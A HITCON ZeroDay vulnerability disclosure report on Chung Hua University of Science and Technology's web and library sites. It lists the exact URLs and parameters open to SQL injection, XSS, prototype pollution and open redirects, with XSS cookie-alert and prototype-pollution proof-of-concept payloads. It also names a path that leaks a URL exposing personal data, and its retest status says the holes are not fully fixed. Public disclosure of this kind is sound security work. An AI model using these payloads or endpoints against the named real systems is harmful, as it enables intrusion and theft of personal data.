中華科技大學 網址參數存在 SQL injection 與 XSS 與原型污染與未驗證的轉址 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00245
  •  發信 Vendor: 中華科技大學
  • Title: 中華科技大學 網址參數存在 SQL injection 與 XSS 與原型污染與未驗證的轉址
  • Introduction: 網址參數存在 SQL injection 與 XSS 與原型污染與未驗證的轉址

處理狀態

目前狀態

公開
Last Update : 2022/06/18
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2022/04/08 15:49:16 : 新提交 (由 BTtea 更新此狀態)
  • 2022/04/08 15:51:26 : 新提交 (由 BTtea 更新此狀態)
  • 2022/04/08 23:57:29 : 新提交 (由 BTtea 更新此狀態)
  • 2022/04/08 23:57:55 : 新提交 (由 BTtea 更新此狀態)
  • 2022/04/09 00:00:18 : 新提交 (由 BTtea 更新此狀態)
  • 2022/04/11 13:50:46 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/11 15:55:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/11 15:55:03 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/11 15:55:03 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/06/08 03:00:01 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2022/06/17 15:34:02 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/06/17 16:30:39 : 未修補完成 (由 BTtea 更新此狀態)
  • 2022/06/18 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2022-00245
  • 通報者:blacktea_player (BTtea)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.cust.edu.tw/www/post/postframe.php?id=1

http://www.cust.edu.tw/www/post/php_rss.php?lid=1

http://library.cust.edu.tw/manager_admin/new_file_download.php?Pact=FileDownLoad&button_num=e5&source_id=&Pval=5211

http://library.cust.edu.tw/portal_c2.php?button_num=c2&search_field=&search_word=&search_field2=&search_word2=&search_field3=&search_word3=&bool1=&bool2=&search_type=1&order_field=&order_type=&page=2

http://library.cust.edu.tw/portal_f2_cnt_page.php?button_num=f2&folder_id=19&cnt_id=245&order_field=rank&order_type=desc&search_field=&search_word=&search_field2=&search_word2=&search_field3=&search_word3=&bool1=&bool2=&search_type=1&up_page=1

http://library.cust.edu.tw/portal_e1.php?button_num=e1&search_type=1

http://library-cust-edu-tw.proxyone.cust.edu.tw/set_page_amount.php?page_amount=15&now_url=https://zeroday.hitcon.org/

https://proxyone.cust.edu.tw:8443/proxy/login/?url=https://zeroday.hitcon.org/

http://192.192.231.232/test.jsp

敘述

繞過腳本 space2hash

http://www.cust.edu.tw/www/post/postframe.php?id=1
id 值存在 SQL injection 與 XSS 與原型污染
圖片

xss payload : '><script>alert(document.cookie)</script>

xss 原型污染 PoC payload : '><script>$.extend(true,{},JSON.parse('{"__proto__":{"z":123'));alert(z);</script>

圖片圖片

http://www.cust.edu.tw/www/post/php_rss.php?lid=1
lid 值存在 SQL injection 與 XSS
圖片
xss payload : '><script>alert(document.cookie)</script>

http://library.cust.edu.tw/manager_admin/new_file_download.php?Pact=FileDownLoad&button_num=e5&source_id=&Pval=5211
source_id , Pval 值存在 SQL injection
圖片圖片

http://library.cust.edu.tw/portal_c2.php?button_num=c2&search_field=&search_word=&search_field2=&search_word2=&search_field3=&search_word3=&bool1=&bool2=&search_type=1&order_field=&order_type=&page=2
page 存在 XSS
xss payload : " onmouseover=alert(document.cookie)>
order_type 值存在 SQL injection
圖片

http://library.cust.edu.tw/portal_f2_cnt_page.php?button_num=f2&folder_id=19&cnt_id=245&order_field=rank&order_type=desc&search_field=&search_word=&search_field2=&search_word2=&search_field3=&search_word3=&bool1=&bool2=&search_type=1&up_page=1
search_field , search_field2 , search_field3 , bool1 , bool2 , search_type , up_page 值存在 XSS
xss payload : " onmouseover=alert(document.cookie)>
圖片

http://library.cust.edu.tw/portal_e1.php?button_num=e1&search_type=1
post 參數 search_field 存在 SQL injection
圖片

https://proxyone.cust.edu.tw:8443/proxy/login/?url=https://www.google.com
http://library-cust-edu-tw.proxyone.cust.edu.tw/set_page_amount.php?page_amount=15&now_url=https://zeroday.hitcon.org/
url , now_url 存在未驗證的轉址

http://192.192.231.232/test.jsp
此路徑洩漏一個網址指向
http://ap.cust.edu.tw/eis/OnlineSync4Lib?pwd=20220408
洩漏大量個資

可被瀏覽的可能洩漏敏感資訊
http://library.cust.edu.tw/rss.php/
http://library.cust.edu.tw/cgi-bin/test-cgi

無意義但是不該出現的路徑
https://www.cust.edu.tw/test.html
https://www.cust.edu.tw/log.txt
https://www.cust.edu.tw/manual/index.html

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;